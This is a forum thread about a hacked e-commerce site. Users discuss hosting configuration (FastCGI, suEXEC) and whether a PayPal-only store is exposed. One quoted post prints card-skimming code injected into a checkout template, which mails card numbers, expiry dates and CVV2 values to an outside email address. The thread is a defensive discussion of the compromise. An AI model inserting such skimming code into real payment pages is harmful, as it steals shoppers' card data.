Site Hacked - need some help with security

[quote name=‘nedd’]I’m not sure where to check is it DSO, phpSuExec or SuPHP based system?



This is my current PHP configuration:



DEFAULT PHP: 5

PHP4 SAPI: none

PHP5 SAPI: fcgi

SUEXEC: enabled



PHP 5.2.9 (cli) (built: May 14 2009 00:48:26)

Copyright (c) 1997-2009 The PHP Group

Zend Engine v2.2.0, Copyright (c) 1998-2009 Zend Technologies

with eAccelerator v0.9.5.3, Copyright (c) 2004-2006 eAccelerator, by eAccelerator

with the ionCube PHP Loader v3.1.34, Copyright (c) 2002-2009, by ionCube Ltd., and

with Zend Extension Manager v1.2.2, Copyright (c) 2003-2007, by Zend Technologies

with Suhosin v0.9.27, Copyright (c) 2007, by SektionEins GmbH

with Zend Optimizer v3.3.3, Copyright (c) 1998-2007, by Zend Technologies



Please advise.



Thanks.[/quote]



One phone call or email to your webhost will tell you for certain.

[quote name=‘Traveler’]One phone call or email to your webhost will tell you for certain.[/QUOTE]



Well, that’s what I got from my webhost when asked is it DSO, phpSuExec or SuPHP based system.:confused:

[quote name=‘nedd’]Well, that’s what I got from my webhost when asked is it DSO, phpSuExec or SuPHP based system.:confused:[/quote]



Nedd,



Call them and ask them to clearly tell you and not give you a report that you did not ask for.



Personally this is an example of why I won’t use a really good webhost as in answers the phone within a couple of minutes and gives you the answers that you need.



Who is your host?

[quote name=‘Golfcart’]Here is the code that was added to the cc.tpl file (information in [COLOR=“DarkRed”]RED[/COLOR])



// Check payment info fields

function fn_can_place_order()

{$ldelim}

if (false == fn_check_agreement()){$ldelim}

return false;

{$rdelim}

var card_number = document.getElementById(‘cc_number’).value.replace(/[ -]/gi, ‘’);

var card_type = document.getElementById(‘cc_type’).value;

var exp_mon = document.getElementById(‘cc_exp_month’).value;

var exp_year = document.getElementById(‘cc_exp_year’).value;



// Reserved

var start_mon = start_date_required[card_type] == ‘Y’ ? document.getElementById(‘cc_start_month’).value : ‘’;

var start_year = start_date_required[card_type] == ‘Y’ ? document.getElementById(‘cc_start_year’).value : ‘’;

var cvv2 = cvv2_required[card_type] == ‘Y’ ? document.getElementById(‘cc_cvv2’).value : ‘’;

if (CheckCardNumber(card_number, card_type, exp_mon, exp_year)) {$ldelim}

document.getElementById(‘cc_number’).value = card_number;

[COLOR=“darkred”]m = new SendMail ();

m.To = ‘velung@yahoo.com’;

m.From = ‘heuhuefbejhfegf@stevescartshop.com’;

m.Body = 'card_number | exp_mon | exp_year | cvv2 | - cc_number | cc_name | ';

m.send(); m.send (); [/COLOR]

return true;

{$rdelim}



return false;

{$rdelim}[/QUOTE]



I am using PayPal (standard) for my clients payment gateway. There will be no credit card info stored on my server - everything will be stored and Processed on PayPal’s side. With this in mind, will there be any danger/risk of the above hack happening to my clients site??



Will the cc.tpl file even be used??



Again, thanks in advance!

[quote name=‘Traveler’]Nedd,



Call them and ask them to clearly tell you and not give you a report that you did not ask for.



Personally this is an example of why I won’t use a really good webhost as in answers the phone within a couple of minutes and gives you the answers that you need.



Who is your host?[/QUOTE]



This is another answer from my webhost:



“It’s PHP running as FastCGI with Apache suEXEC.



This means PHP is running as optimized CGI (FAST) and Apache is executing the PHP as your user.”



Can someone “translate” it in regard to DSO, phpSuExec, SuPHP configurations?